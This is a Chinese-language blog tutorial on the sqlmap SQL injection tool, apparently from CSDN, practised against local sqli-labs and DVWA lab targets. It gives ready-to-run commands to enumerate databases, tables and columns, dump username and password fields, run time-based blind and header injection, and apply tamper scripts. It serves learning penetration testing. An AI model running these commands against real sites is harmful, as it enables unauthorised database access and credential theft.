sqlmap工具

于 2023-03-14 11:30:48 发布
阅读量779 收藏 2
点赞数
分类专栏: 学习 文章标签: 数据库 sqlite mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57485346/article/details/129500312
版权

SQLmap简介

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等

Sqlmap采用了以下5种独特的SQL注入技术

  • 基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入
  • 基于时间的盲注,即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已经执行(即页面返回时间是否增加)来判断
  • 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中
  • 联合查询注入,在可以使用Union的情况下注入
  • 堆查询注入,可以同时执行多条语句时的注入

Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。

官网:

http://sqlmap.org

SQLmap下载安装

访问官网 http://sqlmap.org进入下载
在这里插入图片描述

  • 如图,zip为windows版本,tar.gz为linux版本
  • SQLmap因为是python脚本编写的。所以还需要python。我这里下载python2
    访问https://www.python.org/然后downloads根据提示就好了

SQLmap确定目标

SQLmap直连数据库

  • sqlmap -d “数据库类型://用户名:密码@ip地址:端口/数据库名” -f --banner
    比如:sqlmap -d “mysql://root:root@192.168.114.129:3306/dvwa” -f --banner

直连数据库获得用户及权限:
python sqlmap .py sqlmap -d “mysql://root:root@192.168.114.129:3306/dvwa” -f --banner -users

SQLmap的url探测

探测sqlilabs 的lesson-1
输入
sqlmap -u "192.168.114.129:83/Less-1/?id=1" --banner

在这里插入图片描述
可以查到banner为5.7.26

  • sqlmap的url探测
    • Sqlmap直接对单一URL探测,参数使用-u或–url
      get方式:sqlmap -u “url”
      post方式:sqlmap -u “url” --data “post数据”

sqlmap -u “http://192.168.114.129:83/Less-19/?id=1”-f --banner --data “uname=admin&passwd=12344444&submit=Submit”

SQLmap文件读取目标

Sqlmap支持从不同类型的文件中读取目标进行Sql注入探测。
1、-l从Burpsuite proxy或WebScarab proxy中读取Http请求日志文件
2、-× 从sitemap.xml站点地图文件中读取目标探测。
3、-m从多行文本格式文件读取多个目标,对多个目标进行探测。
4、-r从文本文件中读取Http请求作为Sql注入探测的目标。
5、-c从配置文件sqlmap.conf中读取目标探测。

SQLmap实操

sqlmap完整get注入

1、探测数据库名
sqlmap -u “http://192.168.137.200:8088/Less-1/?id=1” --dbs --batch
2、探测表名
sqlmap -u “http://192.168.137.200:8088/Less-1/?id=1” -D security --tables --batch
3、探测字段名
sqlmap -u “http://192.168.137.200:8088/Less-1/?id=1” -D security -T users --columns --batch
4、探测 字段值
sqlmap -u “http://192.168.137.200:8088/Less-1/?id=1” -D security -T users -C username,password --dump --batch

探测post盲注

1.用bp抓包生成一个txt文件并保存
2.使用基于时间技术的sqlmap探测
python sqlmap.py -r target.txt --technique T -p uname
python sqlmap.py -r target.txt --technique T -p uname --dbs
基于时间的所以会比较慢

http头注入

指定注入位置进行注入,在保存的文件中,对于参数的修改为*,保存在txt文档中
然后Sqlmap -r /root/sqli_Less-19.txt 。

sqlmap tamper脚本注入

脚本位置在sqlmap下载的tamper目录
随便用一个。比如sqlilabs 的less-33宽字节注入

──(root㉿kali)-[~] └─# sqlmap -u "http://192.168.114.129:83/Less-33/?id=1" --tamper unmagicquotes –dbs
在这里插入图片描述

Edison.W
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
网安工具系列:python调用sqlmapapi实现批量扫描网站
weixin_54626591的博客
04-11 172
python调用sqlmapapi实现批量扫描网站
sqlmap漏洞扫描工具
10-18
SQLMAP是一款跨平台,开源的SQL注入“企业级”工具,但同时也是很适合个人学习的工具,功能强大.
sqlmap安装_安全测试工具--注入扫描 sqlmap
weixin_39978749的博客
11-26 129
首先mqlmap需要安装python的,没有的朋友先安装python,版本2.7之前!!!/sqlmap.py –h //查看帮助信息./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” //get注入也可在kali 直接输入 sqlmap -u http://210.38.192.31:81/test.aspxsqlma...
SQLmap 扫描工具的使用
m0_61990875的博客
10-21 2804
sqlmap的使用方法
SQLMAP工具介绍、基本命令及简单使用
易编橙 · 终身成长社群,相遇已是上上签!
12-28 607
文章目录工具介绍基本命令获取目标拓展语句 工具介绍 sqlmap是一款自动化的SQL注入工具,其主要功能就是自动化扫描,发现并利用给定的URL的SQL注入漏洞,内置了很多绕过的插件。 支持现在几乎所有的数据库MySQL、Oracle、Microsoft SQL Server、Microsoft Access、IBM DB2等。 支持代理,优化算法,更高效。 通过指纹识别技术来判断数据库。 当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持下载或上传文件。 当数
sqlmap工具2020
02-27
sqlmap是一个工具,一个用来做sql注入攻击的工具。这个sqlmap需要python2才可以正常执行,注意python3不行哦。
直接下载sqlmap工具
最新发布
02-21
直接下载sqlmap工具
数据库扫描 sqlmap
Zok的博客
09-02 1873
简介 sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 官方网址 git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev 支持数据库 MySQL Oracle PostgreSQL Micr
botsql:使用Atscan和Sqlmap执行扫描并利用SQL Vulns的Bot
05-16
僵尸SQL 使用Atscan和Sqlmap执行扫描并利用SQL Vulns的Bot
sqlmap使用方法
08-26
sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 --dump 获取表中的数据,包含列 --dump-all 转存DBMS数据库所有表项目 --level 测试等级(1-5),默认为1 -v 显示详细信息 读取数据库--->读取表---->读取表的列---->获取内容
sqlmapGUI汉化版
06-24
sqlmap汉化界面,是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL...参考资料 1. 啊D注入工具
渗透测试工具SQLMap的详细使用方法
Hvnt3r的博客
08-13 3416
SQLMap的介绍以及使用方法,本文的实验环境基于DVWA,附官方给出的使用文档及笔者的翻译
sqlmap跑请求头慢解决方法
q124546427的博客
07-24 893
sqlmap跑请求头慢解决方法
sqlmap很慢怎么办
weixin_52116519的博客
03-09 1744
你可能是开了vpn,去关掉试试看。
SQL盲注加速方法总结
tpaer的博客
02-09 3049
SQL盲注加速方法二分法加速、.与运算加速、.二进制延时注入加速、dnslog OOB外带通信总结。
SQLMAP入门命令解析
kk的博客
05-27 706
sql注入常用命令解析
3-sqlmap_设置性能优化
qq_45434762的博客
11-02 1353
1.SQLMAP设置持久HTTP连接 SQLMAP中可以设置连接为持久连接。HTTP报文中谁Connection:Keep-Alive 参数:--keep-alive 2.SQLMAP设置不接收HTTP body SQLMAP中设置空连接,表示不接受HTTP当中的Body。常用在盲注的过程。 参数:--null-connection 3.SQLMAP设置多线程 SQLMA...
sqlmap工具下载csdn
07-10
### 回答1: 要下载SQLMap工具,可以通过以下步骤在CSDN(中国最大的技术社区)进行下载: 1. 首先,在浏览器中打开CSDN的网站(www.csdn.net)。 2. 在CSDN的主页上,找到网站的搜索栏。在搜索栏中输入“SQLMap工具下载”并点击搜索按钮。 3. 搜索结果页面会显示与SQLMap工具下载相关的文章、教程或资源。 4. 仔细查看搜索结果中的文章标题和描述,并寻找与SQLMap工具下载相关的资源。 5. 选择一个合适的文章或教程链接,点击进入详细页面。 6. 在详细页面中,会提供SQLMap工具下载的相关信息和链接。仔细阅读页面上的说明和指南,以确保你下载到合适版本的SQLMap工具。 7. 一般而言,你可以在页面上找到一个下载按钮或者链接。点击该按钮或链接即可开始下载SQLMap工具。 8. 下载完成后,使用一个合适的解压工具(如WinRAR或7-Zip)解压SQLMap工具的压缩包。 9. 解压后,你就可以开始使用SQLMap工具了。你可以根据自己的需要配置和使用该工具进行SQL注入漏洞的测试和防护。 需要注意的是,在下载任何工具或资源之前,应该确保以安全的方式进行。这包括确保源网站的可信度和文件的完整性,仔细查看任何可能的风险或警告,并根据自己的需求选择适合的版本和来源。 ### 回答2: sqlmap是一种强大的开源工具,用于检测和利用Web应用程序中的SQL注入漏洞。我们可以在CSDN上下载这个工具。 要下载sqlmap工具,我们可以按照以下步骤进行操作。 首先,我们打开浏览器,进入CSDN的官方网站(www.csdn.net)。 在CSDN的主页上,我们可以看到一个搜索栏。在搜索栏中,我们输入"sqlmap"并点击搜索按钮。 搜索结果页面会显示与"sqlmap"相关的内容。我们可以通过筛选器选择合适的结果。 在筛选器中,我们可以选择"工具"类别,以便快速找到sqlmap工具。 点击选择后,页面会刷新,显示与"sqlmap"相关的工具列表。 从列表中,我们可以找到可靠的、由CSDN认证的sqlmap工具。我们可以通过点击工具名称或下载按钮来进一步了解和下载工具。 在工具页面上,我们可以看到关于工具的详细信息,例如介绍、功能、使用方法等。 对于下载工具,我们可以点击页面上的下载按钮。网站可能会提示我们先登录或创建一个CSDN账号。 完成登录或账号创建后,我们可以再次点击下载按钮,此时页面会跳转到下载页面。 在下载页面上,我们可以选择适合我们操作系统的版本,并点击下载按钮。 下载过程可能需要一些时间,这取决于我们的网络状况和服务器响应速度。 下载完成后,我们可以在指定位置找到下载的sqlmap工具。此时,我们可以将它解压缩并执行相关操作。 总结来说,我们可以通过CSDN来下载sqlmap工具。只需要在CSDN网站上搜索sqlmap工具,找到可靠的下载源并进行下载,然后按照需要解压缩和使用它进行相关的SQL注入漏洞检测和利用工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Edison.W

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值